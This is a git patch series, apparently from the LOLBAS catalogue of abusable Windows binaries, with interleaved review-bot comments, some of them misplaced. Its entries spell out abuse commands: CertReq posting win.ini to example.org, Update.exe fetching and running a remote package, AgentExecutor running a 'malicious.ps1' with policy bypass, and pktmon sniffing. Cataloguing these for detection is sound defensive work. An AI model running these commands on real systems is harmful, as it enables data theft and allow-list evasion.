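Review bot: Only the first of Regsvcs.yml's two identical command entries has its `Privileges` raised to `Local Admin`; the second entry (`Category: AWL bypass`, outside this hunk) keeps `Privileges: User`, so the file now contradicts itself about whether registration needs elevation. The same `Privileges: Local Admin` change belongs in the second entry in the same commit; a later commit in this series makes it separately.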
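Review bot: The new `MitreLink: https://attack.mitre.org/techniques/T1096` uses a different URL form from the `https://attack.mitre.org/wiki/Technique/...` links on the neighbouring entries in Certutil.yml, so the generated page will show mixed link styles; pick one form for the file. Replacing T1105 with T1096 also drops the download aspect that the entry's own `Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream` still describes; if the schema allows a single ID, the Usecase text should make clear that the ADS mapping is the chosen one.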
@@ -19,13 +19,24 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows 7 and up with .NET installed
+ - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
+ Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
+ Category: AWL Bypass
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10 with .NET Core installed
 Full_Path:
 - Path: 'C:\Program Files\dotnet\dotnet.exe'
 Detection:
 - IOC: dotnet.exe spawned an unknown process
 Resources:
 - Link: https://twitter.com/_felamos/status/1204705548668555264
+ - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
+ - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
 Acknowledgement:
 - Person: felamos
 Handle: '@_felamos'
+ - Person: Jimmy
+ Handle: '@bohops'
 ---
From 343a0e247885d3c96ca6ec80cd5ea984fb8199b1 Mon Sep 17 00:00:00 2001
From: bohops
Date: Fri, 3 Jul 2020 15:03:07 -0400
Subject: [PATCH 49/96] Added plain explorer execution
---
 yml/OSBinaries/Explorer.yml | 12 ++++++++++++
 1 file changed, 12 insertions(+)
diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
index 35ea876..336f44b 100644
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
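Review bot: The new `dotnet.exe msbuild` entry has no `Usecase:` line, while the other command entries in this file carry one between `Description` and `Category`; add e.g. `Usecase: Execute unsigned code from an MSBuild project file`. The `Detection` section is not extended, and `dotnet.exe spawned an unknown process` does not describe this case, where dotnet.exe itself loads and runs the project file; an IOC such as `- IOC: dotnet.exe invoked with the msbuild verb and a project file located in a user-writable directory` would give defenders something to key on. `OperatingSystem: Windows 10 with .NET Core installed` also differs from the `.NET installed` wording of the entries above it; if the SDK is the actual requirement, saying `.NET Core SDK` is more precise.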
@@ -12,6 +12,14 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: explorer.exe C:\Windows\System32\notepad.exe
+ Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
+ Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10 (Tested)
 Full_Path:
 - Path: C:\Windows\explorer.exe
 - Path: C:\Windows\SysWOW64\explorer.exe
@@ -21,7 +29,11 @@ Detection:
 - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
 Resources:
 - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
+ - Link: https://twitter.com/bohops/status/1276356245541335048
+ - Link: https://twitter.com/bohops/status/986984122563391488
 Acknowledgement:
 - Person: Jai Minton
 Handle: '@CyberRaiju'
+ - Person: Jimmy
+ Handle: '@bohops'
 ---
From 640e7f2d65dc1fa90462b7390fbbe98cfa8b881e Mon Sep 17 00:00:00 2001
From: Maxime Nadeau
Date: Fri, 3 Jul 2020 16:59:53 -0400
Subject: [PATCH 50/96] Added a Windows 10 2004 version
---
 yml/OSBinaries/Ttdinject.yml | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
index 23630e8..b208c85 100644
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
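Review bot: `Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe` does not match the command above it, which launches `C:\Windows\System32\notepad.exe`; the two lines should name the same program. The existing IOC only covers `/root` usage, so the new entry ships with no matching detection; something like `- IOC: explorer.exe started with a path to an executable as its only argument, followed by that executable running as a child of the new explorer.exe instance` would cover it. `OperatingSystem: Windows 10 (Tested)` is also a different format from the OS lists used by the other entries in this file.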
@@ -4,6 +4,14 @@ Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying cal
 Author: 'Maxime Nadeau'
 Created: '2020-05-12'
 Commands:
+ - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
+ Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+ Usecase: Spawn process using other binary
+ Category: Execute
+ Privileges: Administrator
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10 2004
 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
 Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
 Usecase: Spawn process using other binary
@@ -11,7 +19,7 @@ Commands:
 Privileges: Administrator
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
- OperatingSystem: Windows 10 1809 and newer
+ OperatingSystem: Windows 10 1909
 Full_Path:
 - Path: C:\Windows\System32\ttdinject.exe
 - Path: C:\Windows\Syswow64\ttdinject.exe
From aa88bf814468b9cbb8be7a51d629364ce14403b6 Mon Sep 17 00:00:00 2001
From: "@dtmsecurity"
Date: Tue, 7 Jul 2020 21:09:06 +0100
Subject: [PATCH 51/96] Create certreq.yml
---
 yml/OSBinaries/certreq.yml | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 yml/OSBinaries/certreq.yml
diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/certreq.yml
new file mode 100644
index 0000000..b02f001
--- /dev/null
+++ b/yml/OSBinaries/certreq.yml
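Review bot: The new entry's `Description` is a verbatim copy of the existing one, so a reader cannot tell why the file now lists two commands; the visible difference is that the 2004 form omits `/ClientScenario TTDRecorder /ddload 0`, and the description should state that, e.g. `Description: Execute calc using ttdinject.exe on Windows 10 2004, where the /ClientScenario and /ddload arguments appear to be no longer needed. Requires administrator privileges. ...`. In the second hunk `OperatingSystem: Windows 10 1809 and newer` becomes `Windows 10 1909`, which silently drops 1809 from the stated range; if the older syntax was tested there, `Windows 10 1809 to 1909` is the accurate statement. The second hunk's command entry starts above the hunk, so its `Command` line is outside this view.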
@@ -0,0 +1,36 @@
+---
+Name: CertReq.exe
+Description: Used for requesting and managing certificates
+Author: 'David Middlehurst'
+Created: '2020-07-07'
+Commands:
+ - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
+ Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+ Usecase: Download file from Internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
+ Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
+ Usecase: Upload
+ Category: Upload
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+ - Path: C:\Windows\System32\certreq.exe
+ - Path: C:\Windows\SysWOW64\certreq.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: certreq creates new files
+ - IOC: certreq makes POST requests
+Resources:
+ - Link: https://dtm.uk/certreq
+Acknowledgement:
+ - Person: David Middlehurst
+ Handle: '@dtmsecurity'
+---
\ No newline at end of file
From 3710c1c9721428012c5ae01f93998f354a7c4195 Mon Sep 17 00:00:00 2001
From: Eleftherios Panos
Date: Thu, 23 Jul 2020 13:58:30 +0300
Subject: [PATCH 52/96] Added method for AgentExecutor
---
 yml/OtherMSBinaries/agentexecutor.yml | 34 +++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 yml/OtherMSBinaries/agentexecutor.yml
diff --git a/yml/OtherMSBinaries/agentexecutor.yml b/yml/OtherMSBinaries/agentexecutor.yml
new file mode 100644
index 0000000..79a19d4
--- /dev/null
+++ b/yml/OtherMSBinaries/agentexecutor.yml
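Review bot: The second `Command:` value ends with the words `and show response in terminal`, which are prose rather than part of the command line, so anything that renders or copies the field verbatim gets a broken invocation; move that text into the Description and leave the command as `CertReq -Post -config https://example.org/ c:\windows\win.ini`. `- Code:` under `Code_Sample` is an empty placeholder that parses as null, and the file name `certreq.yml` is lower-case while this series elsewhere renames files to capitalised names (`Explorer.yml`, `Desktopimgdownldr.yml`). The two IOCs could be tied to the observable: `- IOC: certreq.exe run with -Post -config against a URL that is not the organisation's certificate enrollment endpoint`.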
@@ -0,0 +1,34 @@
+---
+Name: AgentExecutor.exe
+Description: Intune Management Extension included on Intune Managed Devices
+Author: 'Eleftherios Panos'
+Created: '23/07/2020'
+Commands:
+ - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
+ Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
+ Usecase: Execute unsigned powershell scripts
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10
+ - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
+ Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
+ Usecase: Execute a provided EXE
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10
+Full_Path:
+ - Path: C:\Program Files (x86)\Microsoft Intune Management Extension
+Code_Sample:
+ - Code:
+Detection:
+ - IOC:
+Resources:
+ - Link:
+Acknowledgement:
+ - Person: Eleftherios Panos
+ Handle: @lefterispan
+---
\ No newline at end of file
From 689c3b1fea6893afe557eccc71cdd4edabc96897 Mon Sep 17 00:00:00 2001
From: "Chris \"Lopi\" Spehn"
Date: Tue, 4 Aug 2020 07:40:48 -0600
Subject: [PATCH 53/96] Update Regsvcs.yml Fixed inaccurate permissions
---
 yml/OSBinaries/Regsvcs.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml
index d164ef2..274d275 100644
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
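Review bot: `Handle: @lefterispan` is not valid YAML because `@` is a reserved indicator that cannot begin a plain scalar; quote it as `Handle: '@lefterispan'`. `Full_Path` gives a directory, `C:\Program Files (x86)\Microsoft Intune Management Extension`, rather than the executable's path, and `Detection`, `Resources` and `Code_Sample` each hold an empty item (`- IOC:`, `- Link:`, `- Code:`) that parses as null and will be published as a blank. The second command's Description is itself the detection story, AgentExecutor.exe running a `powershell.exe` found in a caller-supplied directory, so `- IOC: AgentExecutor.exe spawning powershell.exe from a path outside %SystemRoot%` would give the entry a usable IOC. `Created: '23/07/2020'` also departs from the `'YYYY-MM-DD'` form used elsewhere in the repo.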
@@ -16,7 +16,7 @@ Commands:
 Description: Loads the target .DLL file and executes the RegisterClass function.
 Usecase: Execute dll file and bypass Application whitelisting
 Category: AWL bypass
- Privileges: User
+ Privileges: Local Admin
 MitreID: T1121
 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
From 3a3d28e49683912fc606f15fd4552df5dc591c47 Mon Sep 17 00:00:00 2001
From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com>
Date: Sat, 8 Aug 2020 14:59:15 +0300
Subject: [PATCH 54/96] Update Extrac32.yml another use case for extrace32.
---
 yml/OSBinaries/Extrac32.yml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml
index e243ed2..a19db9c 100644
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -28,6 +28,14 @@ Commands:
 MitreID: T1105
 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\*\Desktop\calc.exe
+ Description: Command for copying calc.exe to another folder
+ Usecase: Copy file
+ Category: Copy
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\Windows\System32\extrac32.exe
 - Path: C:\Windows\SysWOW64\extrac32.exe
@@ -40,8 +48,10 @@ Resources:
 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 - Link: https://twitter.com/egre55/status/985994639202283520
 Acknowledgement:
+ - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit
+ - Person: Tamir Yehuda https://github.com/tamirye
 - Person: egre55
 Handle: '@egre55'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
\ No newline at end of file
+---
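Review bot: The destination `C:\Users\*\Desktop\calc.exe` in the new Extrac32 entry carries a wildcard in the output path, which is not a runnable example and is unlikely to be expanded by the tool; name a concrete path (a later commit in this series replaces the `*`). The two new `Acknowledgement` items embed a GitHub URL inside `Person:` instead of supplying a `Handle:` field like the entries below them. Mapping a purely local file copy to `MitreID: T1105` is also a stretch, since T1105 (Ingress Tool Transfer) is about bringing tools in from outside the environment; the file's existing download entries fit it, this one does not obviously.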
From 2450b9fc0abad0f9c4f93fe47d350df3610b962f Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:01:46 +0300 Subject: [PATCH 55/96] Update Extrac32.yml --- yml/OSBinaries/Extrac32.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index a19db9c..2e00049 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -49,7 +49,9 @@ Resources: - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit + - handle: @VakninHai - Person: Tamir Yehuda https://github.com/tamirye + - handle: @tim8288 - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe From be19ca53ed9476a23785039802f4938edc023cf0 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:02:05 +0300 Subject: [PATCH 56/96] Update Extrac32.yml --- yml/OSBinaries/Extrac32.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 2e00049..7b913cb 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -48,12 +48,12 @@ Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit - - handle: @VakninHai - - Person: Tamir Yehuda https://github.com/tamirye - - handle: @tim8288 - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit + - handle: @VakninHai + - Person: Tamir Yehuda https://github.com/tamirye + - handle: @tim8288 --- From 4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834 Mon Sep 17 00:00:00 2001 
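Review bot: `- handle: @VakninHai` and `- handle: @tim8288` are broken in three ways: the key is lower-case `handle` where the schema uses `Handle`, the leading dash makes each a separate list item rather than a field of the preceding `Person`, and the unquoted `@` cannot begin a plain YAML scalar, so the file fails to parse. Each should be an indented `Handle: '@VakninHai'` / `Handle: '@tim8288'` under its person entry. The second hunk on this line (the re-ordering commit) moves the same four lines and carries the same defect; a later commit in the series rewrites them.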
From: Tamirye <34610125+Tamirye@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:09:53 +0300 Subject: [PATCH 57/96] Create diantz.yml use daintz.exe to download and compress a binary file from a remote server\internet or use it to store file in Alternate data stream. --- yml/OSBinaries/diantz.yml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 yml/OSBinaries/diantz.yml diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/diantz.yml new file mode 100644 index 0000000..a79ecc3 --- /dev/null +++ b/yml/OSBinaries/diantz.yml 
@@ -0,0 +1,39 @@
+
+---
+Name: diantz.exe
+Description: Binary that package existing files into a cabinet (.cab) file
+Author: Tamir Yehuda
+Created: 08/08/2020
+Commands:
+ - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
+ Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+ Usecase: Hide data compressed into an Alternate Data Stream.
+ Category: ADS
+ Privileges: User
+ MitreID: T1096
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+ OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+ - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
+ Description: Download and compress a remote file and store it in a cab file on local machine.
+ Usecase: Download and compress into a cab file.
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+Full_Path:
+ - Path: c:\windows\system32\diantz.exe
+ - Path: c:\windows\syswow64\diantz.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: diantz storing data into alternate data streams.
+ - IOC: diantz getting a file from a remote machine or the internet.
+Resources:
+ - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
+Acknowledgement:
+ - Person: Tamir Yehuda
+ Handle: @tim8288
+ - Person: Hai Vaknin
+ Handle: @vakninhai
+---
From ed1e113460ccf5f87d2fb083c03a570758e4c7f2 Mon Sep 17 00:00:00 2001
From: Reegun J
Date: Mon, 10 Aug 2020 11:31:48 +0800
Subject: [PATCH 58/96] Update update.yml Hi, I have updated with new findings - Reegun
---
 yml/OtherMSBinaries/update.yml | 42 ++++++++++++++++++++++++++++++----
 1 file changed, 38 insertions(+), 4 deletions(-)
diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml
index 44cbd61..5195cf0 100644
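Review bot: The new diantz.yml begins with an empty added line before `---`, and both `Handle: @tim8288` and `Handle: @vakninhai` are unquoted, which a YAML parser rejects because `@` cannot begin a plain scalar; quote them as `Handle: '@tim8288'` and `Handle: '@vakninhai'`. Both `OperatingSystem` values end with a period and omit Windows 10, unlike the OS lists in the other entries, and `Created: 08/08/2020` is not the quoted ISO form used elsewhere. Text fixes: `Binary that package` → `Binary that packages`, `Compress taget file` → `Compress target file`. The two IOCs are a reasonable start and could name the command-line signal, a `:` stream separator in the output argument or a UNC source path, so a detection engineer has something concrete to match.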
--- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update [url to package] + - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -20,7 +20,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update [url to package] + - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute 
@@ -28,7 +28,23 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --updateRoolback=[url to package] + - Command: Update.exe --update=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --update=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass 
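Review bot: The new `\\remoteserver\payloadFolder` entries (two in this hunk, two more in the next hunk) reuse the description `will go to url and look for RELEASES file ... via SAMBA`, but the source is a UNC path rather than a URL and the protocol is SMB (Samba is one server implementation of it). Suggested wording: `Description: The above binary will open the UNC path, look for a RELEASES file, and download and install the nuget package over SMB.` The file's `Detection` section, outside this hunk, could also gain an IOC for Update.exe reading from a UNC path so the new variants are covered.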
@@ -52,6 +68,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary 
@@ -70,11 +102,13 @@ Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 + - Link: https://twitter.com/reegun21/status/1291005287034281990 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 + - Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/ Acknowledgement: - - Person: Reegun J (OCBC Bank) + - Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave) Handle: '@reegun21' - Person: Mr.Un1k0d3r Handle: '@MrUn1k0d3r' From eb0279838bcbce541360cd8f576700c3dfcb4c7d Mon Sep 17 00:00:00 2001 From: binar-x79 <45055730+binar-x79@users.noreply.github.com> Date: Wed, 12 Aug 2020 22:04:03 -0700 Subject: [PATCH 59/96] Create pktmon.yml --- yml/OSBinaries/pktmon.yml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 yml/OSBinaries/pktmon.yml diff --git a/yml/OSBinaries/pktmon.yml b/yml/OSBinaries/pktmon.yml new file mode 100644 index 0000000..6eb22f4 --- /dev/null +++ b/yml/OSBinaries/pktmon.yml 
@@ -0,0 +1,35 @@
+---
+Name: pktmon.exe
+Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
+Author: Derek Johnson
+Created: '2020-08-12'
+Commands:
+ - Command: pktmon.exe start --etw
+ Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
+ Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic
+ Category: Reconnaissance
+ Privileges: Administrator
+ MitreID: T1040
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1040
+ OperatingSystem: Windows 10 1809 and later
+- Command: pktmon.exe filter add -p 445
+ Description: Select Desired ports for packet capture
+ Usecase: Look for interesting traffic such as telent or FTP
+ Category: Reconnaissance
+ Privileges: Administrator
+ MitreID: T1040
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1040
+ OperatingSystem: Windows 10 1809 and later
+Full_Path:
+ - Path: c:\windows\system32\pktmon.exe
+ - Path: c:\windows\syswow64\pktmon.exe
+Code_Sample:
+ - Code: http://url.com/git.txt
+Detection:
+ - IOC: .etl files found on system
+Resources:
+ - Link: https://binar-x79.com/windows-10-secret-sniffer/
+Acknowledgement:
+ - Person:
+ Handle:
+---
From 631996950ab24390e0c5b740a298840b34eb34ee Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:05:16 +0200
Subject: [PATCH 60/96] Update Extrac32.yml
---
 yml/OSBinaries/Extrac32.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml
index 7b913cb..faa25ea 100644
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
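Review bot: `- Command: pktmon.exe filter add -p 445` sits at column 0 while the first command item is indented under `Commands:`, so the document is not valid YAML (a sequence cannot continue at the parent mapping's indentation); indent it to match the first item. `Code_Sample: - Code: http://url.com/git.txt` is a placeholder URL and `Acknowledgement` holds an empty `Person:`/`Handle:` pair, both of which would be published as-is. `- IOC: .etl files found on system` is too broad to act on; `- IOC: pktmon.exe invoked with start or filter add, or creation of PktMon.etl outside an administrator's troubleshooting session` is closer to what a defender can alert on. Typos: `senstive`, `telent`, and `Usecase: use this a built in` is missing "as".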
@@ -28,7 +28,7 @@ Commands:
 MitreID: T1105
 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\*\Desktop\calc.exe
+ - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
 Description: Command for copying calc.exe to another folder
 Usecase: Copy file
 Category: Copy
From 2dabdb0840dab96ac3b846a400827a56dde5edd0 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:13:16 +0200
Subject: [PATCH 61/96] adjusted extrac32 yml error
---
 yml/OSBinaries/Extrac32.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml
index faa25ea..3addec9 100644
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@@ -52,8 +52,8 @@ Acknowledgement:
 Handle: '@egre55'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
- - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit
- - handle: @VakninHai
- - Person: Tamir Yehuda https://github.com/tamirye
- - handle: @tim8288
+ - Person: Hai Vaknin(Lux
+ Handle: '@VakninHai'
+ - Person: Tamir Yehuda
+ Handle: '@tim8288'
 ---
From b592be60270715ec12d7e4cc11e404cd48b7740d Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:17:27 +0200
Subject: [PATCH 62/96] Update Manage-bde.yml Remove extra -
---
 yml/OSScripts/Manage-bde.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml
index 86024e6..d5a8a4d 100644
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@@ -36,5 +36,5 @@ Acknowledgement:
 - Person: Daniel Bohannon
 Handle: '@danielbohannon'
 - Person: John Lambert
- - Handle: '@JohnLaTwC'
+ Handle: '@JohnLaTwC'
 ---
